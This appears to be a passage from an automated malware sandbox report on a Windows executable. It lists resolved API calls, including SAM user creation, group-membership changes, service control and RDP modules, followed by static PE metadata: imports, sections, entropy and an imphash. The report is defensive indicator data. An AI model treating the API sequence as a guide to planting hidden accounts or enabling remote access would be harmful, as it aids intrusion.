- "kernel32.dll.GlobalReAlloc",
- "kernel32.dll.WaitForMultipleObjectsEx",
- "kernel32.dll.lstrcmpiW",
- "kernel32.dll.WritePrivateProfileStringW",
- "kernel32.dll.GlobalFindAtomW",
- "urlmon.dll.CoInternetCreateSecurityManager",
- "urlmon.dll.CoInternetCreateZoneManager",
- "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcStringFreeW",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamCreateUser2InDomain",
- "samlib.dll.SamQueryInformationUser",
- "samlib.dll.SamSetInformationUser",
- "cryptbase.dll.SystemFunction028",
- "rpcrt4.dll.NDRCContextBinding",
- "rpcrt4.dll.RpcBindingToStringBindingW",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "rpcrt4.dll.RpcStringBindingParseW",
- "samlib.dll.SamCloseHandle",
- "sechost.dll.LookupAccountSidLocalW",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaLookupNames2",
- "advapi32.dll.LsaClose",
- "advapi32.dll.LsaFreeMemory",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamAddMemberToAlias",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.#417",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "propsys.dll.PropVariantToGUID",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "ole32.dll.CoInitializeSecurity",
- "sechost.dll.LookupAccountNameLocalW",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.GetTickCount64",
- "sqlmap.dll.ServiceMain",
- "sqlmap.dll.SvchostPushServiceGlobals",
- "termsrv.dll.ServiceMain",
- "termsrv.dll.SvchostPushServiceGlobals",
- "ole32.dll.CoFreeUnusedLibrariesEx",
- "ole32.dll.CoRegisterClassObject",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "ole32.dll.CoImpersonateClient",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.CoRevertToSelf",
- "advapi32.dll.QueryTraceW",
- "lsmproxy.dll.DllGetClassObject",
- "lsmproxy.dll.DllCanUnloadNow",
- "regapi.dll.RegGetMachinePolicyEx",
- "secur32.dll.InitSecurityInterfaceW",
- "cryptsp.dll.SystemFunction035",
- "user32.dll.LoadStringW",
- "ole32.dll.CLSIDFromString",
- "regapi.dll.RegQueryListenerStart",
- "rdpwsx.dll.WsxInitialize",
- "rdpwsx.dll.WsxDestroy",
- "rdpwsx.dll.WsxConnect",
- "rdpwsx.dll.WsxDisconnect",
- "rdpwsx.dll.WsxInitializeClientData",
- "rdpwsx.dll.WsxConvertPublishedApp",
- "rdpwsx.dll.WsxWinStationInitialize",
- "rdpwsx.dll.WsxWinStationRundown",
- "rdpwsx.dll.WsxVirtualChannelSecurity",
- "rdpwsx.dll.WsxIcaStackIoControl",
- "rdpwsx.dll.WsxBrokenConnection",
- "rdpwsx.dll.WsxLogonNotify",
- "rdpwsx.dll.WsxSetErrorInfo",
- "rdpwsx.dll.WsxSendAutoReconnectStatus",
- "rdpwsx.dll.WsxEscape",
- "rdpwsx.dll.WsxOpenVirtualChannel",
- "rdpwsx.dll.WsxCanLogonProceed",
- "rdpwsx.dll.WsxGetConnectionProperty",
- "rdpwsx.dll.WsxAutomationVerification",
- "rdpwsx.dll.WsxVerify",
- "rdpwsx.dll.WsxExchangeStackConfig",
- "rdpwsx.dll.WsxQueryGatewayPolicies",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.StartServiceW",
- "sechost.dll.CloseServiceHandle",
- "crypt32.dll.CryptProtectData",
- "cryptbase.dll.SystemFunction040",
- "rpcrt4.dll.NdrClientCall3",
- "sechost.dll.ControlService",
- "umrdp.dll.ServiceMain",
- "umrdp.dll.SvchostPushServiceGlobals",
- "sechost.dll.RegisterServiceCtrlHandlerExW",
- "sechost.dll.SetServiceStatus",
- "sechost.dll.QueryServiceStatus",
- "setupapi.dll.SetupDiGetClassDevsW",
- "setupapi.dll.SetupDiEnumDeviceInterfaces",
- "setupapi.dll.SetupDiEnumDeviceInfo",
- "setupapi.dll.SetupDiGetDeviceRegistryPropertyW",
- "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
- "setupapi.dll.SetupDiDestroyDeviceInfoList",
- "ole32.dll.CLSIDFromProgID",
- "rpcrt4.dll.RpcServerUseProtseqEpW",
- "rpcrt4.dll.RpcServerRegisterIfEx",
- "rpcrt4.dll.RpcServerListen",
- "rpcrt4.dll.RpcServerUnregisterIfEx",
- "setupapi.dll.SetupDiOpenDevRegKey",
- "rpcrt4.dll.RpcServerUnregisterIf"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FlushFileBuffers",
- "address": "0x43603c"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x436040"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x436044"
- },
- {
- "name": "HeapSize",
- "address": "0x436048"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x43604c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x436050"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x436054"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x436058"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x43605c"
- },
- {
- "name": "SetStdHandle",
- "address": "0x436060"
- },
- {
- "name": "CreateFileW",
- "address": "0x436064"
- },
- {
- "name": "AllocConsole",
- "address": "0x436068"
- },
- {
- "name": "GetGeoInfoA",
- "address": "0x43606c"
- },
- {
- "name": "K32EnumPageFilesW",
- "address": "0x436070"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x436074"
- },
- {
- "name": "Sleep",
- "address": "0x436078"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x43607c"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x436080"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x436084"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x436088"
- },
- {
- "name": "GetCPInfo",
- "address": "0x43608c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x436090"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x436094"
- },
- {
- "name": "FindNextFileA",
- "address": "0x436098"
- },
- {
- "name": "VirtualProtect",
- "address": "0x43609c"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x4360a0"
- },
- {
- "name": "FindFirstFileExA",
- "address": "0x4360a4"
- },
- {
- "name": "FindClose",
- "address": "0x4360a8"
- },
- {
- "name": "CloseHandle",
- "address": "0x4360ac"
- },
- {
- "name": "GetFileType",
- "address": "0x4360b0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x4360b4"
- },
- {
- "name": "HeapFree",
- "address": "0x4360b8"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4360bc"
- },
- {
- "name": "GetACP",
- "address": "0x4360c0"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x4360c4"
- },
- {
- "name": "ExitProcess",
- "address": "0x4360c8"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x4360cc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4360d0"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4360d4"
- },
- {
- "name": "WriteFile",
- "address": "0x4360d8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4360dc"
- },
- {
- "name": "RaiseException",
- "address": "0x4360e0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x4360e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4360e8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x4360ec"
- },
- {
- "name": "TlsFree",
- "address": "0x4360f0"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4360f4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4360f8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4360fc"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x436100"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x436104"
- },
- {
- "name": "DecodePointer",
- "address": "0x436108"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x43610c"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x436110"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x436114"
- },
- {
- "name": "TerminateProcess",
- "address": "0x436118"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x43611c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x436120"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x436124"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x436128"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x43612c"
- },
- {
- "name": "InitializeSListHead",
- "address": "0x436130"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x436134"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x436138"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x43613c"
- },
- {
- "name": "RtlUnwind",
- "address": "0x436140"
- },
- {
- "name": "GetLastError",
- "address": "0x436144"
- },
- {
- "name": "SetLastError",
- "address": "0x436148"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x43614c"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x436150"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "FindWindowW",
- "address": "0x4361b4"
- },
- {
- "name": "GetTouchInputInfo",
- "address": "0x4361b8"
- },
- {
- "name": "DdeCmpStringHandles",
- "address": "0x4361bc"
- },
- {
- "name": "MessageBoxA",
- "address": "0x4361c0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x4361e4"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "DuplicateToken",
- "address": "0x436000"
- },
- {
- "name": "ObjectPrivilegeAuditAlarmA",
- "address": "0x436004"
- },
- {
- "name": "PerfDecrementULongCounterValue",
- "address": "0x436008"
- },
- {
- "name": "CredUnmarshalCredentialA",
- "address": "0x43600c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "VarBstrFromDate",
- "address": "0x436170"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "AVIStreamRelease",
- "address": "0x436014"
- }
- ],
- "dll": "AVIFIL32.dll"
- },
- {
- "imports": [
- {
- "name": "DeregisterManageableLogClient",
- "address": "0x4361f8"
- }
- ],
- "dll": "clfsw32.dll"
- },
- {
- "imports": [
- {
- "name": "ClusterNodeGetEnumCount",
- "address": "0x43601c"
- }
- ],
- "dll": "CLUSAPI.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_AddMasked",
- "address": "0x436024"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "UnDecorateSymbolNameW",
- "address": "0x436200"
- }
- ],
- "dll": "dbghelp.dll"
- },
- {
- "imports": [
- {
- "name": "DnsDhcpRegisterHostAddrs",
- "address": "0x43602c"
- }
- ],
- "dll": "DNSAPI.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436208"
- }
- ],
- "dll": "dsuiext.dll"
- },
- {
- "imports": [
- {
- "name": "GetMonitorContrast",
- "address": "0x436210"
- }
- ],
- "dll": "dxva2.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436218"
- },
- {
- "name": "GdipDisposeImageAttributes",
- "address": "0x43621c"
- },
- {
- "name": "GdipGetImageFlags",
- "address": "0x436220"
- },
- {
- "name": "GdipSetPathGradientPresetBlend",
- "address": "0x436224"
- }
- ],
- "dll": "gdiplus.dll"
- },
- {
- "imports": [
- {
- "name": "NotifyAddrChange",
- "address": "0x436034"
- }
- ],
- "dll": "IPHLPAPI.DLL"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436158"
- }
- ],
- "dll": "MAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "MprAdminInterfaceGetCredentials",
- "address": "0x436160"
- }
- ],
- "dll": "MPRAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DRMGetEnvironmentInfo",
- "address": "0x43622c"
- }
- ],
- "dll": "msdrm.dll"
- },
- {
- "imports": [
- {
- "name": "ICInfo",
- "address": "0x436168"
- }
- ],
- "dll": "MSVFW32.dll"
- },
- {
- "imports": [
- {
- "name": "glColor4sv",
- "address": "0x436178"
- }
- ],
- "dll": "OPENGL32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantToUInt32",
- "address": "0x436180"
- }
- ],
- "dll": "PROPSYS.dll"
- },
- {
- "imports": [
- {
- "name": "ResUtilSetResourceServiceEnvironment",
- "address": "0x436188"
- }
- ],
- "dll": "RESUTILS.dll"
- },
- {
- "imports": [
- {
- "name": "RpcServerListen",
- "address": "0x436190"
- },
- {
- "name": "NdrConformantStringMemorySize",
- "address": "0x436194"
- }
- ],
- "dll": "RPCRT4.dll"
- },
- {
- "imports": [
- {
- "name": "MgmDeleteGroupMembershipEntry",
- "address": "0x436234"
- }
- ],
- "dll": "rtm.dll"
- },
- {
- "imports": [
- {
- "name": "CM_Add_Range",
- "address": "0x43619c"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DllRegisterWindowClasses",
- "address": "0x4361a4"
- }
- ],
- "dll": "SHDOCVW.dll"
- },
- {
- "imports": [
- {
- "name": "lineGetAddressCaps",
- "address": "0x4361ac"
- }
- ],
- "dll": "TAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "WsCreateMessageForChannel",
- "address": "0x43623c"
- }
- ],
- "dll": "webservices.dll"
- },
- {
- "imports": [
- {
- "name": "WinBioControlUnit",
- "address": "0x436244"
- }
- ],
- "dll": "winbio.dll"
- },
- {
- "imports": [
- {
- "name": "IWICMetadataQueryReader_GetLocation_Proxy",
- "address": "0x4361ec"
- },
- {
- "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
- "address": "0x4361f0"
- }
- ],
- "dll": "WindowsCodecs.dll"
- },
- {
- "imports": [
- {
- "name": "WinHttpQueryOption",
- "address": "0x4361c8"
- }
- ],
- "dll": "WINHTTP.dll"
- },
- {
- "imports": [
- {
- "name": "FindNextUrlCacheContainerW",
- "address": "0x4361d0"
- },
- {
- "name": "InternetCheckConnectionA",
- "address": "0x4361d4"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutGetErrorTextW",
- "address": "0x4361dc"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x43624c"
- }
- ],
- "dll": "wsnmp32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x000a0d78",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0042685e",
- "timestamp": "2019-06-23 22:20:50",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00034800",
- "entropy": "6.32",
- "raw_address": "0x00000400",
- "virtual_size": "0x0003461b",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00036000",
- "size_of_data": "0x00008c00",
- "entropy": "5.45",
- "raw_address": "0x00034c00",
- "virtual_size": "0x00008bd6",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x0004ee00",
- "entropy": "6.08",
- "raw_address": "0x0003d800",
- "virtual_size": "0x0005045c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00090000",
- "size_of_data": "0x00000600",
- "entropy": "4.70",
- "raw_address": "0x0008c600",
- "virtual_size": "0x00000488",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00091000",
- "size_of_data": "0x00007a00",
- "entropy": "6.45",
- "raw_address": "0x0008cc00",
- "virtual_size": "0x0000799c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003dc34",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000002bc"
- },
- {
- "virtual_address": "0x00090000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000488"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00091000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x0000799c"
- },
- {
- "virtual_address": "0x0003d520",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x0000001c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d540",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000040"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00036000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000254"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "c8503ab5366fc6e13552bba734a2de16",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 34,
- "versioninfo": []
- }
- }